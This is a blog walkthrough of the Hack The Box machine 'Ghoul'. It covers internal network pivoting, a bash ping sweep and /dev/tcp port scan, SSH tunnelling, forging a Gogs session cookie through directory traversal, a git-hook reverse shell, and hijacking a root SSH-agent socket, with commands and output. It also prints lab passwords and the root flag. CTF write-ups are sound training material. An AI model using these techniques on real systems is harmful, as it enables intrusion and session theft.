Hey fellas! This is the follow-up post to pwn the ghould from hackthebox. You can find the part 1 of the walkthrough here.
Lets quickly jump into grabbing the root.txt
After logging in as kaneki there were a few files present.
Notes.txt has something interesting!
The content of other files were
root@Aogiri:/home/Eto# cat alert.txt Hey Noro be sure to keep checking the humans for IP logs and chase those little shits down! root@Aogiri:/home/kaneki# cat notes I've set up file server into the server's network ,Eto if you need to transfer files to the server can use my pc. DM me for the access. root@Aogiri:/home/noro# cat to-do.txt Need to update backups.
note.txt talking about the vulnerability in gogs and there is some file server present that means a different system. Also, there are some test accounts present.
Lets find any active machine.
Next task was to find all the other active mahines. That can be done by compiling the nmap binary, but why not try writing a bash script to do the same?!
Below is the script to find the online machines using bash and ping
#!/bin/bash for i in $(seq 2 255); do ping -c 1 -W 1 172.20.0.$i 1>/dev/null 2>&1 if [[ $? -eq 0 ]]; then echo "172.20.0.$i - Online" fi done
So the script found 2 ips online : 172.20.0.10 and 172.20.0.150
Listing the contents of authorized keys bought to my notice that kaneki_pub is a user on the machine with hostname kaneki-p (whose ip is 172.20.0.150). So let’s try sshing!!!
It asks for passphrase. Remeber when the website leaked secret.php. It contained our passphare being : ILoveTouka <3 and voila we got in. Same pass is used again and again!
to-do.txt tells us that a user named AogiriTest is present.
Ifconfig is giving us 2 network interfaces eth0 and eth1. Aogiri’s ip is 172.20.0.10 and kaneki-pc’s ip is 172.20.0.150 hence they are on the same network.
Now in ifconfig of kaneki-pc, we can clearly see completely different network present that has the subnet mask of 172.18.0.0/24. Now lets create a script to scan for port on eth1 interface. We can use the previously built script to find out the active machines.
172.18.0.2 came out to be as an active machine. So lets scan for its ports.
#!/bin/bash echo 1 > /dev/tcp/172.18.0.2/$1 1>/dev/null 2>&1 if [[ $? -eq 0 ]]; then echo "172.18.0.2:$1 - online" fi
And we get 22 and 3000 as online. I just made a guess with 3000 as its the default port for gogs and earlier we got some hints around txt files.
In order to access the gogs, ssh port-forwarding has to be done.
Reason? Gogs is running inside a docker which has no gui. So in order to view the gui and run gogs on the browser, the port X of the local machine has to be mapped to the port 3000 of the docker. And thats called as ssh port forwarding.
Tunneling
press enter and then ~C to enter the ssh mode
You can find more about ssh konami codes hereā https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/
We will be doing a local port forward. So we r listening on our box and then we will be directing this to 172.20.0.150 (where we had our kaneki_pub) on port 22
root@kali:~/Desktop/hackthebox/ghoul# ssh -p 5001 -i kaneki kaneki_pub@localhost load pubkey "kaneki": invalid format Enter passphrase for key 'kaneki': Last login: Sun Nov 29 09:05:38 2020 from 172.20.0.10 kaneki_pub@kaneki-pc:~$ kaneki_pub@kaneki-pc:~$ kaneki_pub@kaneki-pc:~$ ssh> -L 3000:172.18.0.2:3000
After sshing from the local machine as kaneki_pub, port 3000 of kaneki-pc has to be mapped with port 3000 of the local machine. So when i run http://localhost:3000 on local machine, it is actually getting executed on kaneki-pc. I hope everything makes sense!!!
Now we have a tunnel that is listening on our port 3000 and will go to 172.18.0.2:3000
And we get gogs landing page, asking for username and password. But notice that version of gogs.
Now a bit of previous information is required. to-do.txt revelas a username AogiriTest of which the password can be found in tomcat configuration files.
password found in the tomcat (test@aogiri123)
Once logged into the gogs, create a repository.
root@kali:~/Desktop/hackthebox/ghoul# go run cookiegen.go 0eff81040102ff82000110011000005aff82000306737472696e670c070005756e616d6506737472696e670c060004726f6f7406737472696e670c0a00085f6f6c645f75696406737472696e670c0300013106737472696e670c05000375696405696e74363404020002
it created a go serialized object
upload this file on the newly created git repo.
The vulnerable version allows us to perform a directory traversal.
Viewing the page source gives us the information about directory.
So now, we need to do a directory traversal. If the file exsts, i_like_gogits will execute the data file
And voila! We are now signed in as kaneki.
Now the git hooks can be modified to get the reverse shell based on triggers of file upload.
Open a nc listener on local machine and upload a file on git gogs. Make a commit.
And we get a shell with git user.
Now run enumeration script (linenum.sh). I found gosu binary was present. And you guessed it right, it can be used to escalate privileges.
A few more steps revelas the actual password for user- kaneki on git gogs
I downloaded the 7z file on local machine for analysis. git reflog got me something interesting.
# git diff e29ad43
So there were multiple passwords written in here. But the one that works is kaneki: 7^Grc%C\7xEQ?tb4
I quickly did su
Oh man! Its not over yet!!!
I again did some more enumeration and found out that ssh-agent is running on the box.
Root is periodically logging in and hence his session can be captured and we will be able to finally login as root on the box that is hosting all the docker machines.
What is ssh-agent??
You can relate that to single-sign on. So you just give the credentails once and the agent will take care of signing in to the rest of the services. The agent keeps track of the user’s identity keys and the passphrase and then uses those keys to login to other servers. SSH ForwardAgent is yes means the agent is active.
Getting the root
- watch -n 1 ls
and watch for newly created sessions. and use that agent to login to root via ssh
There are 3 agent files already present. Whenever a new session is identified, a folder is created. cd there run the command below.
But you need to be quick as the session is valid for less time.
- root@kaneki-pc> SSH_AUTH_SOCK=agent.735 ssh root@172.18.0.1 -p 2222
The above command has to be used to login with the hijacked session. port 2222 is used as from previous nmap scan, it was identified that ssh is open on 2 ports. SSH to root@172.18.0.1 will directly take us to the main machine that hosts all the dockers ( as 172.18.0.1 is the bridge between the host machine and the docker-machine)
root@kaneki-pc:/tmp/ssh-DDqnmNeHYt# watch -n 1 ls root@kaneki-pc:/tmp/ssh-DDqnmNeHYt# cd .. root@kaneki-pc:/tmp# watch -n 1 ls root@kaneki-pc:/tmp# cd ssh-OWLSx63kgc root@kaneki-pc:/tmp/ssh-OWLSx63kgc# ls agent.35823 root@kaneki-pc:/tmp/ssh-OWLSx63kgc# SSH_AUTH_SOCK=agent.35823 ssh root@172.18.0.1 -p 2222 Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-45-generic x86_64) * Documentation: <https://help.ubuntu.com> * Management: <https://landscape.canonical.com> * Support: <https://ubuntu.com/advantage> * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: <https://ubuntu.com/livepatch> 155 packages can be updated. 0 updates are security updates. Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings Last login: Sun Nov 29 08:48:01 2020 from 172.18.0.200 root@Aogiri:~# whoami root root@Aogiri:~# ls log.sh root.txt root@Aogiri:~# cat root.txt 7c0f11041f210f4fadff7c077539e72f root@Aogiri:~#
Well! That was a long one!!! But got my way through! Big thanks to ippsec’s walkthrough for the references i had to take while stuck!
Extras
Lets have a look at the ifconfig command for this machine!
root@Aogiri:~# ifconfig br-1fdaa7f6f1a9: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 inet 172.21.0.1 netmask 255.255.0.0 broadcast 172.21.255.255 ether 02:42:59:85:5b:cf txqueuelen 0 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 br-26bd0e80040c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255 inet6 fe80::42:42ff:fed8:69e1 prefixlen 64 scopeid 0x20<link> ether 02:42:42:d8:69:e1 txqueuelen 0 (Ethernet) RX packets 1336 bytes 525072 (525.0 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1322 bytes 264314 (264.3 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 br-3a83615557c8: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 inet 172.19.0.1 netmask 255.255.0.0 broadcast 172.19.255.255 ether 02:42:e2:32:73:03 txqueuelen 0 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 br-fceeb1f42539: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.20.0.1 netmask 255.255.0.0 broadcast 172.20.255.255 inet6 fe80::42:e1ff:feda:39ef prefixlen 64 scopeid 0x20<link> ether 02:42:e1:da:39:ef txqueuelen 0 (Ethernet) RX packets 13439 bytes 2843945 (2.8 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 14422 bytes 1265247 (1.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:64:7b:bd:8a txqueuelen 0 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.101 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 fe80::250:56ff:feb9:d94c prefixlen 64 scopeid 0x20<link> inet6 dead:beef::250:56ff:feb9:d94c prefixlen 64 scopeid 0x0<global> ether 00:50:56:b9:d9:4c txqueuelen 1000 (Ethernet) RX packets 14396 bytes 1168534 (1.1 MB) RX errors 0 dropped 43 overruns 0 frame 0 TX packets 13026 bytes 3217119 (3.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 40295 bytes 2863663 (2.8 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 40295 bytes 2863663 (2.8 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 veth4eed7dc: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet6 fe80::c0a7:32ff:fec5:92a5 prefixlen 64 scopeid 0x20<link> ether c2:a7:32:c5:92:a5 txqueuelen 0 (Ethernet) RX packets 789 bytes 1207193 (1.2 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1084 bytes 175777 (175.7 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 veth524b739: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet6 fe80::30f7:d9ff:fee0:f277 prefixlen 64 scopeid 0x20<link> ether 32:f7:d9:e0:f2:77 txqueuelen 0 (Ethernet) RX packets 13110 bytes 2457241 (2.4 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 13968 bytes 1190093 (1.1 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 vethf122d05: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet6 fe80::e4f2:f7ff:fefc:93c7 prefixlen 64 scopeid 0x20<link> ether e6:f2:f7:fc:93:c7 txqueuelen 0 (Ethernet) RX packets 1808 bytes 318386 (318.3 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1649 bytes 1086435 (1.0 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 vethf6a4f69: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet6 fe80::18d2:b2ff:feea:6cd3 prefixlen 64 scopeid 0x20<link> ether 1a:d2:b2:ea:6c:d3 txqueuelen 0 (Ethernet) RX packets 24862 bytes 3722251 (3.7 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 25130 bytes 3237106 (3.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Thats very well designed network! Kudos to the creators of the machine. This lab provided loads of information!!
Thats all for the blog post! Hope you learned something out of it. See you in the next one!
Until then, happy hunting!!